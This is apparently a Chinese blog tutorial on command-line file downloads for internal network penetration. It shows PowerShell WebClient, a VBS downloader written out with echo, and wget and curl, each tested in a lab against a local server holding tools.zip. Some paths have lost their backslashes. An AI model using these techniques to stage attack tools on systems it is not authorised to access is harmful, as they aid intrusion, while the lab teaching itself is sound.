在进行内网渗透时,根据不同的需求需要不同的文件下载,在图形界面下操作时比较简单的,但是必要时还是需要通过命令行进行文件下载,所以本篇文章就简单介绍总结一些命令行文件下载的方式
命令行文件下载可以分为Windows
和Linux
两种类型
Windows类型
使用powershell进行文件下载
powershell默认存在于windows高版本(7 8 10),对于低版本有另外一种方法,见VBS处
- 通过cmd打开powershell
C:Usersyonghu>start powershell
- 输入命令
$client = new-object System.Net.WebClient
$client.DownloadFile('#1', '#2')
#1:要下载文件的出处
#2:文件保存位置(注意反斜杠 )
实例
实验环境:
win10:使用powershell
win2003 :搭建服务器 IP:192.168.31.123
假设服务器上有个tools.zip文件
win10 下打开powershell
输入命令进行文件下载
可以在目录下看到下载了该文件
使用VBS脚本进行文件下载
这种情况对应于没有powershell的低版本windows
- 通过cmd写vbs文件
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>hhh.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>hhh.vbs
echo Post.Open "GET","http://192.168.31.123/tools.zip",0 >>hhh.vbs
echo Post.Send() >>hhh.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>hhh.vbs
echo aGet.Mode = 3 >>hhh.vbs
echo aGet.Type = 1 >>hhh.vbs
echo aGet.Open() >>hhh.vbs
echo aGet.Write(Post.responseBody) >>hhh.vbs
echo aGet.SaveToFile "c: ools.zip",2 >>hhh.vbs
hhh.vbs文件里面的内容就是
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.31.123/tools.zip",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c: ools.zip",2
执行该vbs脚本,即可
实例
实验环境:
win2003-1:搭建服务器 IP:192.168.31.123
win2003-2:利用vbs脚本下载文件
服务器上有tools.zip文件
使用cmd命令进行输入,最后的脚本代码如下:
执行该vbs脚本,下载得到tools.zip文件
Linux类型
在Linux中,有内置的wget和curl命令,实现文件的下载
通过wget命令进行文件下载
- 在命令行窗口输入指令
wget http://xxx.xxx
实例
实验环境:
win2003:搭建服务器 IP:192.168.31.123
kali-Linux: Linux系统下载文件(我这电脑目前就安了kali,就将就下)
输入指令 回车即可 得到文件
通过curl命令进行文件下载
- 输入指令
curl http://192.168.31.123/tools.zip >> tools.zip
实例
win2003:搭建服务器 IP:192.168.31.123
kali-Linux: Linux系统下载文件(我这电脑目前就安了kali,就将就下)
输入指令 回车即可 得到文件